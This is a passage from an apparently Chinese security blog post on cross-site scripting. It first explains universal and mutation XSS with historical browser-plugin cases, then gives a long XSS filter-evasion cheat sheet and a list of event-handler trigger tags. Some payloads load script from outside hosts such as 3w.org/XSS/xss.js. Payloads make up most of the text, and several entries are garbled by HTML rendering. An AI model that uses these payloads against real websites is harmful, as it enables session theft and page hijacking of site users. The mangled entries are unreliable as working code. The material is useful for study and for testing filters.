<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304161706951.png" alt="img">通过点击“修改链接”按钮，调用changeLink()方法，使用innerHTML属性，更改（设置）该标签的value为”RUNOOB”,并修改链接目标，作用如下图：</p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304161706764.png" alt="img"></p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304161706661.png" alt="img"></p>
<h3 id="4、通用型XSS"><a href="#4、通用型XSS" class="headerlink" title="4、通用型XSS"></a>4、通用型XSS</h3><p>通用型XSS，也叫做UXSS或者Universal XSS，全称Universal Cross-Site Scripting。</p>
<p>上面三种XSS攻击的是因为客户端或服务端的代码开发不严谨等问题而存在漏洞的目标网站或者应用程序。这些攻击的先决条件是访问页面存在漏洞，但是<strong>UXSS是一种利用浏览器或者浏览器扩展漏洞来制造产生XSS的条件并执行代码的一种攻击类型。</strong></p>
<h4 id="成因-2"><a href="#成因-2" class="headerlink" title="成因"></a>成因</h4><p>  Web浏览器是正在使用的最流行的应用程序之一，当一个新漏洞被发现的时候，不管自己利用还是说报告给官方，而这个过程中都有一段不小的时间，这一过程中漏洞都可能被利用于UXSS。</p>
<p>不仅是浏览器本身的漏洞，现在主流浏览器都支持扩展程序的安装，而众多的浏览器扩展程序可能导致带来更多的漏洞和安全问题。因为UXSS攻击不需要网站页面本身存在漏洞，同时可能访问其他安全无漏洞页面，使得UXSS成为XSS里危险和最具破坏性的攻击类型之一。</p>
<h4 id="举例："><a href="#举例：" class="headerlink" title="举例："></a>举例：</h4><h5 id="IE6或火狐浏览器扩展程序Adobe-Acrobat的漏洞"><a href="#IE6或火狐浏览器扩展程序Adobe-Acrobat的漏洞" class="headerlink" title="IE6或火狐浏览器扩展程序Adobe Acrobat的漏洞"></a>IE6或火狐浏览器扩展程序Adobe Acrobat的漏洞</h5><p>这是一个比较经典的例子。当使用扩展程序时导致错误，使得代码可以执行。这是一个在pdf阅读器中的bug，允许攻击者在客户端执行脚本。构造恶意页面，写入恶意脚本，并利用扩展程序打开pdf时运行代码。tefano Di Paola 和 Giorgio Fedon在一个在Mozilla Firefox浏览器Adobe Reader的插件中可利用的缺陷中第一个记录和描述的UXSS，Adobe插件通过一系列参数允许从外部数据源取数据进行文档表单的填充，如果没有正确的执行，将允许跨站脚本攻击。</p>
<h5 id="Flash-Player-UXSS-漏洞-–-CVE-2011-2107"><a href="#Flash-Player-UXSS-漏洞-–-CVE-2011-2107" class="headerlink" title="Flash Player UXSS 漏洞 – CVE-2011-2107"></a>Flash Player UXSS 漏洞 – CVE-2011-2107</h5><p>一个在2011年Flash Player插件（当时的所有版本）中的缺陷使得攻击者通过使用构造的.swf文件，可以访问Gmail设置和添加转发地址。因此攻击者可以收到任意一个被攻破的Gmail帐号的所有邮件副本（发送的时候都会抄送份）。Adobe承认了该漏洞.</p>
<p>案例详见: Flash Player UXSS 漏洞 – CVE-2011-2107报告</p>
<p>移动设备也不例外，而且可以成为XSS攻击的目标。Chrome安卓版存在一个漏洞，允许攻击者将恶意代码注入到Chrome通过Intent对象加载的任意的web页面。</p>
<h5 id="安卓版Chrome浏览器漏洞"><a href="#安卓版Chrome浏览器漏洞" class="headerlink" title="安卓版Chrome浏览器漏洞"></a>安卓版Chrome浏览器漏洞</h5><h3 id="5、突变型XSS"><a href="#5、突变型XSS" class="headerlink" title="5、突变型XSS"></a>5、突变型XSS</h3><p> 突变型XSS，也叫做mXSS或，全称Mutation-based Cross-Site-Scripting。（mutation，突变，来自遗传学的一个单词，大家都知道的基因突变，gene mutation）  </p>
<h4 id="成因-3"><a href="#成因-3" class="headerlink" title="成因"></a>成因</h4><p>如果用户所提供的富文本内容通过javascript代码进入innerHTML属性后，一些意外的变化可能会发生：浏览器的渲染引擎将本来没有任何危害的HTML代码渲染成具有潜在危险的XSS攻击代码。</p>
<p>随后，该段攻击代码，可能会被JS代码中的其它一些流程输出到DOM中或是其它方式被再次渲染，从而导致XSS的执行。 这种<strong>由于HTML内容进入innerHTML后发生意外变化</strong>，而最终导致XSS的攻击流程我们称为mXSS.</p>
<h4 id="mXSS种类"><a href="#mXSS种类" class="headerlink" title="mXSS种类"></a>mXSS种类</h4><p>目前为止已知的mXSS种类，接下来的部分将分别对这几类进行讨论与说明。</p>
<h5 id="1、反引号打破属性边界导致的-mXSS"><a href="#1、反引号打破属性边界导致的-mXSS" class="headerlink" title="1、反引号打破属性边界导致的 mXSS"></a>1、反引号打破属性边界导致的 mXSS</h5><p>该类型是最早被发现并利用的一类mXSS，于2007年被提出，随后被有效的修复</p>
<h5 id="2、未知元素中的xmlns属性所导致的mXSS"><a href="#2、未知元素中的xmlns属性所导致的mXSS" class="headerlink" title="2、未知元素中的xmlns属性所导致的mXSS"></a>2、未知元素中的xmlns属性所导致的mXSS</h5><p>一些浏览器不支持HTML5的标记，例如IE8，会将article，aside，menu等当作是未知的HTML标签。</p>
<h5 id="3、CSS中反斜线转义导致的mXSS"><a href="#3、CSS中反斜线转义导致的mXSS" class="headerlink" title="3、CSS中反斜线转义导致的mXSS"></a>3、CSS中反斜线转义导致的mXSS</h5><p>在CSS中，允许用\来对字符进行转义，例如：property: ‘v\61 lue’ 表示 property:’value’，其中61是字母a的ascii码（16进制）。\后也可以接unicode，例如：\20AC 表示 € 。正常情况下，这种转义不会有问题。但是碰上innerHTML后，一些奇妙的事情就会发生。</p>
<h5 id="4、CSS中双引号实体或转义导致的mXSS"><a href="#4、CSS中双引号实体或转义导致的mXSS" class="headerlink" title="4、CSS中双引号实体或转义导致的mXSS"></a>4、CSS中双引号实体或转义导致的mXSS</h5><p>接着上一部分，依然是CSS中所存在的问题，" &amp;#x22; &amp;#34; 等双引号的表示形式均可导致这类问题</p>
<h5 id="5、CSS属性名中的转义所导致的mXSS；"><a href="#5、CSS属性名中的转义所导致的mXSS；" class="headerlink" title="5、CSS属性名中的转义所导致的mXSS；"></a>5、CSS属性名中的转义所导致的mXSS；</h5><h5 id="6、非HTML文档中的实体突变；"><a href="#6、非HTML文档中的实体突变；" class="headerlink" title="6、非HTML文档中的实体突变；"></a>6、非HTML文档中的实体突变；</h5><h5 id="7、-HTML文档中的非HTML上下文的实体突变；"><a href="#7、-HTML文档中的非HTML上下文的实体突变；" class="headerlink" title="7、 HTML文档中的非HTML上下文的实体突变；"></a>7、 HTML文档中的非HTML上下文的实体突变；</h5><h2 id="3、XSS攻击代码出现的场景"><a href="#3、XSS攻击代码出现的场景" class="headerlink" title="3、XSS攻击代码出现的场景"></a>3、XSS攻击代码出现的场景</h2><pre class="line-numbers language-html"><code class="language-html">普通的XSS JavaScript注入，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>SCRIPT</span> <span class="token attr-name">SRC</span><span class="token attr-value"><span class="token punctuation">=</span>http://3w.org/XSS/xss.js</span><span class="token punctuation">></span></span><span class="token script language-javascript"></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>SCRIPT</span><span class="token punctuation">></span></span>

IMG标签XSS使用JavaScript命令，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>SCRIPT</span> <span class="token attr-name">SRC</span><span class="token attr-value"><span class="token punctuation">=</span>http://3w.org/XSS/xss.js</span><span class="token punctuation">></span></span><span class="token script language-javascript"></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>SCRIPT</span><span class="token punctuation">></span></span>

IMG标签无分号无引号，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>IMG</span> <span class="token attr-name">SRC</span><span class="token attr-value"><span class="token punctuation">=</span>javascript:alert(‘XSS’)</span><span class="token punctuation">></span></span>

IMG标签大小写不敏感，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>IMG</span> <span class="token attr-name">SRC</span><span class="token attr-value"><span class="token punctuation">=</span>JaVaScRiPt:alert(‘XSS’)</span><span class="token punctuation">></span></span>

HTML编码(必须有分号)，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>IMG</span> <span class="token attr-name">SRC</span><span class="token attr-value"><span class="token punctuation">=</span>javascript:alert(“XSS”)</span><span class="token punctuation">></span></span>

修正缺陷IMG标签，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>IMG</span> <span class="token attr-name">“”"</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>SCRIPT</span><span class="token punctuation">></span></span><span class="token script language-javascript"><span class="token function">alert</span><span class="token punctuation">(</span>“XSS”<span class="token punctuation">)</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>SCRIPT</span><span class="token punctuation">></span></span>”>

formCharCode标签，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>IMG</span> <span class="token attr-name">SRC</span><span class="token attr-value"><span class="token punctuation">=</span>javascript:alert(String.fromCharCode(88,83,83))</span><span class="token punctuation">></span></span>

UTF-8的Unicode编码，示例如下：
&lt;IMG SRC=jav..省略..S')>

7位的UTF-8的Unicode编码是没有分号的，示例如下：
&lt;IMG SRC=jav..省略..S')>

十六进制编码也是没有分号，示例如下：
&lt;IMG SRC=\'#\'" /span>

嵌入式标签,将Javascript分开，示例如下：
&lt;IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

嵌入式编码标签,将Javascript分开，示例如下：
&lt;IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

嵌入式换行符，示例如下：
&lt;IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
  
嵌入式回车，示例如下：
&lt;IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

嵌入式多行注入JavaScript,这是XSS极端的例子，示例如下：
&lt;IMG SRC=\'#\'" /span>

解决限制字符(要求同页面)，示例如下：
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript">z<span class="token operator">=</span>z<span class="token operator">+</span> <span class="token function">’write</span><span class="token punctuation">(</span>“‘</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript">z<span class="token operator">=</span>z<span class="token operator">+</span> ’<span class="token operator">&lt;</span>script’</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript">z<span class="token operator">=</span>z<span class="token operator">+</span> ’ src<span class="token operator">=</span>ht’</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript">z<span class="token operator">=</span>z<span class="token operator">+</span> ’tp<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>ww’</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript">z<span class="token operator">=</span>z<span class="token operator">+</span> ’w<span class="token punctuation">.</span>shell’</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript">z<span class="token operator">=</span>z<span class="token operator">+</span> ’<span class="token punctuation">.</span>net<span class="token operator">/</span><span class="token number">1</span><span class="token punctuation">.</span>’</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript">z<span class="token operator">=</span>z<span class="token operator">+</span> ’js<span class="token operator">></span><span class="token operator">&lt;</span><span class="token operator">/</span>sc’</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript">z<span class="token operator">=</span>z<span class="token operator">+</span> ’ript<span class="token operator">></span>”<span class="token punctuation">)</span>’</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
      <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript"><span class="token function">eval_r</span><span class="token punctuation">(</span>z<span class="token punctuation">)</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
空字符，示例如下：
 perl -e ‘print “<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>IMG</span> <span class="token attr-name">SRC</span><span class="token attr-value"><span class="token punctuation">=</span>java\0script:alert(\”XSS\”)</span><span class="token punctuation">></span></span>”;’ > out

空字符2,空字符在国内基本没效果.因为没有地方可以利用，示例如下：
perl -e ‘print “<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>SCR\0IPT</span><span class="token punctuation">></span></span>alert(\”XSS\”)<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>SCR\0IPT</span><span class="token punctuation">></span></span>”;’ > out

Spaces和meta前的IMG标签，示例如下：
&lt;IMG SRC=\'#\'"  
javascript:alert(‘XSS’);”>

Non-alpha-non-digit XSS，示例如下：
&lt;SCRIPT/XSS SRC=\'#\'" /span><span class="token script language-javascript">http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>3w<span class="token punctuation">.</span>org<span class="token operator">/</span>XSS<span class="token operator">/</span>xss<span class="token punctuation">.</span>js”<span class="token operator">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>SCRIPT</span><span class="token punctuation">></span></span>

Non-alpha-non-digit XSS to 2，示例如下：
&lt;BODY onload!#$%&amp;()*~+ -_.,:;?@[/|\]^`=alert(“XSS”)>

Non-alpha-non-digit XSS to 3，示例如下：
&lt;SCRIPT/SRC=\'#\'" /span><span class="token script language-javascript">http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>3w<span class="token punctuation">.</span>org<span class="token operator">/</span>XSS<span class="token operator">/</span>xss<span class="token punctuation">.</span>js”<span class="token operator">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>SCRIPT</span><span class="token punctuation">></span></span>

双开括号，示例如下：
&lt;<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>SCRIPT</span><span class="token punctuation">></span></span><span class="token script language-javascript"><span class="token function">alert</span><span class="token punctuation">(</span>“XSS”<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment" spellcheck="true">//&lt;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>SCRIPT</span><span class="token punctuation">></span></span>

无结束脚本标记(仅火狐等浏览器)，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>SCRIPT</span> <span class="token attr-name">SRC</span><span class="token attr-value"><span class="token punctuation">=</span>http://3w.org/XSS/xss.js?&lt;B</span><span class="token punctuation">></span></span><span class="token script language-javascript">

无结束脚本标记<span class="token number">2</span>，示例如下：
<span class="token operator">&lt;</span>SCRIPT SRC<span class="token operator">=</span><span class="token comment" spellcheck="true">//3w.org/XSS/xss.js></span>

半开的HTML<span class="token operator">/</span>JavaScript XSS，示例如下：
<span class="token operator">&lt;</span>IMG SRC<span class="token operator">=</span>\'#\'" <span class="token operator">/</span>span<span class="token operator">></span>

双开角括号，示例如下：
<span class="token operator">&lt;</span>iframe src<span class="token operator">=</span>http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>3w<span class="token punctuation">.</span>org<span class="token operator">/</span>XSS<span class="token punctuation">.</span>html <span class="token operator">&lt;</span>

无单引号 双引号 分号，示例如下：
<span class="token operator">&lt;</span>SCRIPT<span class="token operator">></span>a<span class="token operator">=</span><span class="token regex">/XSS/</span>
<span class="token function">alert</span><span class="token punctuation">(</span>a<span class="token punctuation">.</span>source<span class="token punctuation">)</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>SCRIPT</span><span class="token punctuation">></span></span>

换码过滤的JavaScript，示例如下：
  \”;alert(‘XSS’);//

结束Title标签，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>TITLE</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>SCRIPT</span><span class="token punctuation">></span></span><span class="token script language-javascript"><span class="token function">alert</span><span class="token punctuation">(</span>“XSS”<span class="token punctuation">)</span><span class="token punctuation">;</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>SCRIPT</span><span class="token punctuation">></span></span>

Input Image，示例如下：
&lt;INPUT SRC=\'#\'" /span>

BODY Image，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>BODY</span> <span class="token attr-name">BACKGROUND</span><span class="token attr-value"><span class="token punctuation">=</span>”javascript:alert(‘XSS’)”</span><span class="token punctuation">></span></span>

BODY标签，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>BODY(‘XSS’)</span><span class="token punctuation">></span></span>

IMG Dynsrc，示例如下：
&lt;IMG DYNSRC=\'#\'" /span>

IMG Lowsrc，示例如下：
&lt;IMG LOWSRC=\'#\'" /span>

BGSOUND，示例如下：
&lt;BGSOUND SRC=\'#\'" /span>

STYLE sheet，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>LINK</span> <span class="token attr-name">REL</span><span class="token attr-value"><span class="token punctuation">=</span>”stylesheet”</span> <span class="token attr-name">HREF</span><span class="token attr-value"><span class="token punctuation">=</span>”javascript:alert(‘XSS’);”</span><span class="token punctuation">></span></span>

远程样式表，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>LINK</span> <span class="token attr-name">REL</span><span class="token attr-value"><span class="token punctuation">=</span>”stylesheet”</span> <span class="token attr-name">HREF</span><span class="token attr-value"><span class="token punctuation">=</span>”http://3w.org/xss.css”</span><span class="token punctuation">></span></span>

List-style-image(列表式)，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>STYLE</span><span class="token punctuation">></span></span><span class="token style language-css"><span class="token selector">li </span><span class="token punctuation">{</span><span class="token property">list-style-image</span><span class="token punctuation">:</span> <span class="token url">url(“javascript:alert(‘XSS’)</span>”<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token punctuation">}</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>STYLE</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>UL</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>LI</span><span class="token punctuation">></span></span>XSS

IMG VBscript，示例如下：
&lt;IMG SRC=\'#\'" /STYLE><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>UL</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>LI</span><span class="token punctuation">></span></span>XSS

META链接url，示例如下：
&lt;META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>

Iframe，示例如下：
&lt;IFRAME SRC=\'#\'" /IFRAME>
Frame，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>FRAMESET</span><span class="token punctuation">></span></span>&lt;FRAME SRC=\'#\'" /FRAMESET>

Table，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>TABLE</span> <span class="token attr-name">BACKGROUND</span><span class="token attr-value"><span class="token punctuation">=</span>”javascript:alert(‘XSS’)”</span><span class="token punctuation">></span></span>

TD，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>TABLE</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>TD</span> <span class="token attr-name">BACKGROUND</span><span class="token attr-value"><span class="token punctuation">=</span>”javascript:alert(‘XSS’)”</span><span class="token punctuation">></span></span>

DIV background-image，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>DIV</span> <span class="token attr-name">STYLE</span><span class="token attr-value"><span class="token punctuation">=</span>”background-image:</span> <span class="token attr-name"><span class="token namespace">url(javascript:</span>alert(‘XSS’))”</span><span class="token punctuation">></span></span>

DIV background-image后加上额外字符(1-32&amp;34&amp;39&amp;160&amp;8192-8&amp;13&amp;12288&amp;65279)，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>DIV</span> <span class="token attr-name">STYLE</span><span class="token attr-value"><span class="token punctuation">=</span>”background-image:</span> <span class="token attr-name"><span class="token namespace">url(javascript:</span>alert(‘XSS’))”</span><span class="token punctuation">></span></span>

DIV expression，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>DIV</span> <span class="token attr-name">STYLE</span><span class="token attr-value"><span class="token punctuation">=</span>”width:</span> <span class="token attr-name">expression_r(alert(‘XSS’));”</span><span class="token punctuation">></span></span>

STYLE属性分拆表达，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>IMG</span> <span class="token attr-name">STYLE</span><span class="token attr-value"><span class="token punctuation">=</span>”xss:expression_r(alert(‘XSS’))”</span><span class="token punctuation">></span></span>

匿名STYLE(组成:开角号和一个字母开头)，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>XSS</span> <span class="token attr-name">STYLE</span><span class="token attr-value"><span class="token punctuation">=</span>”xss:expression_r(alert(‘XSS’))”</span><span class="token punctuation">></span></span>

STYLE background-image，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>STYLE</span><span class="token punctuation">></span></span><span class="token style language-css"><span class="token selector"><span class="token class">.XSS</span></span><span class="token punctuation">{</span><span class="token property">background-image</span><span class="token punctuation">:</span><span class="token url">url(“javascript:alert(‘XSS’)</span>”<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token punctuation">}</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>STYLE</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>A</span> <span class="token attr-name">CLASS</span><span class="token attr-value"><span class="token punctuation">=</span>XSS</span><span class="token punctuation">></span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>A</span><span class="token punctuation">></span></span>

IMG STYLE方式，示例如下：
  exppression(alert(“XSS”))’>

STYLE background，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>STYLE</span><span class="token punctuation">></span></span><span class="token style language-css"><span class="token selector">&lt;STYLE type=”text/css”>BODY</span><span class="token punctuation">{</span><span class="token property">background</span><span class="token punctuation">:</span><span class="token url">url(“javascript:alert(‘XSS’)</span>”<span class="token punctuation">)</span><span class="token punctuation">}</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>STYLE</span><span class="token punctuation">></span></span>

BASE，示例如下：
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>BASE</span> <span class="token attr-name">HREF</span><span class="token attr-value"><span class="token punctuation">=</span>”javascript:alert(‘XSS’);//”</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="2、常用标签触发语句"><a href="#2、常用标签触发语句" class="headerlink" title="2、常用标签触发语句"></a>2、常用标签触发语句</h4><pre class="line-numbers language-javascript"><code class="language-javascript"><span class="token operator">&lt;</span>scirpt<span class="token operator">></span>
  <span class="token operator">&lt;</span>scirpt<span class="token operator">></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span>
  <span class="token operator">&lt;</span>a<span class="token operator">></span>
  <span class="token operator">&lt;</span>a href<span class="token operator">=</span><span class="token string">"javascript:alert(`xss`);"</span><span class="token operator">></span>xss<span class="token operator">&lt;</span><span class="token operator">/</span>a<span class="token operator">></span>
  <span class="token operator">&lt;</span>img<span class="token operator">></span>
  <span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token number">1</span> onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span>
  <span class="token operator">&lt;</span>input<span class="token operator">></span>
  <span class="token operator">&lt;</span>input onfocus<span class="token operator">=</span><span class="token string">"alert('xss');"</span><span class="token operator">></span>
  <span class="token operator">&lt;</span>details<span class="token operator">></span>
  <span class="token operator">&lt;</span>details ontoggle<span class="token operator">=</span><span class="token string">"alert('xss');"</span><span class="token operator">></span>
  <span class="token operator">&lt;</span>svg<span class="token operator">></span>
  <span class="token operator">&lt;</span>svg onload<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span>
  <span class="token operator">&lt;</span>select<span class="token operator">></span>
  <span class="token operator">&lt;</span>select onfocus<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">></span><span class="token operator">&lt;</span><span class="token operator">/</span>select<span class="token operator">></span>
  <span class="token operator">&lt;</span>iframe<span class="token operator">></span>
  <span class="token operator">&lt;</span>iframe onload<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span><span class="token operator">&lt;</span><span class="token operator">/</span>iframe<span class="token operator">></span>
  <span class="token operator">&lt;</span>video<span class="token operator">></span>
  <span class="token operator">&lt;</span>video<span class="token operator">></span><span class="token operator">&lt;</span>source onerror<span class="token operator">=</span><span class="token string">"alert(1)"</span><span class="token operator">></span>
  <span class="token operator">&lt;</span>audio<span class="token operator">></span>
  <span class="token operator">&lt;</span>audio src<span class="token operator">=</span>x  onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span>
  <span class="token operator">&lt;</span>body<span class="token operator">></span>
  <span class="token operator">&lt;</span>body<span class="token operator">/</span>onload<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span>
  <span class="token operator">&lt;</span>textarea<span class="token operator">></span>
  <span class="token operator">&lt;</span>textarea onfocus<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> autofocus<span class="token operator">></span>
  <span class="token operator">&lt;</span>keygen<span class="token operator">></span>
  <span class="token operator">&lt;</span>keygen autofocus onfocus<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token operator">></span>
  <span class="token operator">&lt;</span>marquee<span class="token operator">></span>
  <span class="token operator">&lt;</span>marquee onstart<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token operator">></span><span class="token operator">&lt;</span><span class="token operator">/</span>marquee<span class="token operator">></span>
  <span class="token operator">&lt;</span>isindex<span class="token operator">></span>
  <span class="token operator">&lt;</span>isindex type<span class="token operator">=</span>image src<span class="token operator">=</span><span class="token number">1</span> onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token operator">></span>
  <span class="token operator">&lt;</span>link<span class="token operator">></span>
  <span class="token operator">&lt;</span>link rel<span class="token operator">=</span><span class="token keyword">import</span> href<span class="token operator">=</span><span class="token string">"http://127.0.0.1/1.js"</span><span class="token operator">></span>
